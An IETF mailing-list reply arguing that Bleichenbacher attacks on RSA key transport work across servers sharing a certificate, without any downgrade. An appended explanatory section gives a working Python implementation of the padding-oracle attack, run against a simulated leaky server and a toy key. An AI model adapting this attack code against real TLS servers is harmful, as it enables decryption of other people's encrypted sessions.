On Fri, 27 Oct 2017 05:20:40 -0400 Viktor Dukhovni <ietf-d...@dukhovni.org> wrote:
> Mostly we should avoid major layer violations here. Servers will
> support the vast majority of non-deprecated ciphers and need
> to support at least the MTI ciphers. Clients will likely balk
> at doing RC4 or 3DES, and insist on AES128. They'll likely
> prefer ciphers with DHE or ECDHE and GCM (for better or worse)
> over other types of ciphers, but STS should be over-prescriptive
> here. As my name appears on the DROWN paper, it would be remiss
> of me not to concede that RSA key transport should be avoided,
> but the way to do that is to promote the use of stronger options
> more than by proscribing the weaker ones. The basic TLS protocol
> does a fair job of avoiding downgrade attacks, especially because
> MTAs (unlike browsers) don't generally do the protocol fallback
> dance.

That's not how Bleichenbacher attacks work... (which you should know as a
co-author of the DROWN paper.)

As has been pointed out multiple times, this attack works cross-protocol
and cross-server, so the mere existence of a vulnerable TLS RSA
implementation with the same cert is a risk. You don't need any downgrade
attack for that.

-- 
Hanno Böck
https://hboeck.de/

mail/jabber: ha...@hboeck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42

_______________________________________________
Uta mailing list
Uta@ietf.org
https://www.ietf.org/mailman/listinfo/uta
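The cross-server point in the reply above, worked through as an added example (it is not part of the thread and not code posted by either participant): one RSA private key is deployed both on a server that handles PKCS#1 v1.5 decryption the way RFC 5246 section 7.4.7.1 prescribes and on a server that reacts observably differently to bad padding. The leaky deployment is a Bleichenbacher oracle, and it is enough to decrypt a ClientKeyExchange that was sent to the hardened deployment; nothing about the hardened server's own handshake has to be downgraded. Everything here is constructed for the demo: the key is a toy 234-bit modulus built from two Mersenne primes (trivially factorable, irrelevant to the oracle), the 16-byte premaster secret stands in for the real 48-byte one, and the oracle is modelled as a boolean return value rather than an alert or timing difference.

```python
# Added demo, not from the thread: one RSA key deployed on a hardened server and
# on a leaky one. The leaky server's padding oracle decrypts a ClientKeyExchange
# sent to the hardened server (Bleichenbacher 1998); no downgrade is involved.
import random

# Toy key: two Mersenne primes, trivially factorable, but fine for showing the oracle.
P, Q = (1 << 127) - 1, (1 << 107) - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8          # 30-byte modulus

def pkcs1_v15_pad(msg, k, rng):
    """EM = 00 02 <nonzero PS> 00 <msg>, as a TLS client wraps the premaster secret."""
    ps = bytes(rng.randrange(1, 256) for _ in range(k - len(msg) - 3))
    return b"\x00\x02" + ps + b"\x00" + msg

def leaky_server(n, d):
    """Padding oracle: any observable difference (alert type, timing, log line) between
    good and bad PKCS#1 v1.5 padding. Returns True when the handshake would continue."""
    k = (n.bit_length() + 7) // 8
    return lambda c: pow(c, d, n).to_bytes(k, "big")[:2] == b"\x00\x02"

def hardened_server(n, d, rng, pms_len):
    """RFC 5246 7.4.7.1: on bad padding carry on with a random premaster secret, so the
    peer sees the same (MAC) failure either way and learns nothing about the padding."""
    k = (n.bit_length() + 7) // 8
    def premaster(c):
        fake = bytes(rng.getrandbits(8) for _ in range(pms_len))   # drawn unconditionally
        em = pow(c, d, n).to_bytes(k, "big")
        sep = em.find(b"\x00", 2)
        ok = em[:2] == b"\x00\x02" and sep >= 10 and k - sep - 1 == pms_len  # PS >= 8 bytes
        return em[sep + 1:] if ok else fake
    return premaster

def bleichenbacher(c, n, e, oracle):
    """Recover c^d mod n from a conforming c using only the oracle (steps 2-4 of the
    paper; the blinding step 1 is unnecessary because c is already conforming)."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))
    queries = 0
    def cdiv(a, b):
        return -(-a // b)
    def conforming(s):
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, e, n) % n)
    M = [(2 * B, 3 * B - 1)]
    s = cdiv(n, 3 * B)                             # step 2.a: first conforming multiplier
    while not conforming(s):
        s += 1
    while True:
        new = []                                   # step 3: narrow every interval
        for a, b in M:
            for r in range(cdiv(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, cdiv(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = []
        for lo, hi in sorted(new):                 # merge overlapping intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries                # step 4: a single candidate is left
        if len(M) > 1:                             # step 2.b: next conforming s
            s += 1
            while not conforming(s):
                s += 1
            continue
        a, b = M[0]                                # step 2.c: roughly halve the interval
        r = cdiv(2 * (b * s - 2 * B), n)
        while True:
            hit = next((t for t in range(cdiv(2 * B + r * n, b), (3 * B - 1 + r * n) // a + 1)
                        if conforming(t)), None)
            if hit is not None:
                s = hit
                break
            r += 1

def demo(seed=7, pms=b"pms-stand-in-16B"):
    """Returns (premaster recovered through the leaky server, oracle queries used)."""
    rng = random.Random(seed)
    hardened = hardened_server(N, D, rng, len(pms))   # the server the client actually talks to
    oracle = leaky_server(N, D)                        # another deployment of the same key
    c = pow(int.from_bytes(pkcs1_v15_pad(pms, K, rng), "big"), E, N)  # recorded ClientKeyExchange
    assert hardened(c) == pms and hardened(c ^ 1) != pms  # the hardened side itself leaks nothing
    m, queries = bleichenbacher(c, N, E, oracle)
    em = m.to_bytes(K, "big")
    return em[em.index(b"\x00", 2) + 1:], queries

if __name__ == "__main__":
    secret, q = demo()
    print(f"recovered {secret!r} with {q} queries to the leaky server")
```

The attacker never talks to the hardened server and never needs it to offer a weak cipher suite; it only needs a ciphertext encrypted under the shared public key and a yes/no answer from whichever deployment of the private key still leaks. That is why the thread's argument is about the key and certificate, not about the cipher list of any one server. With a real 2048-bit key the query count grows into the hundreds of thousands, which is exactly what the "million message" name refers to, but the structure of the attack does not change.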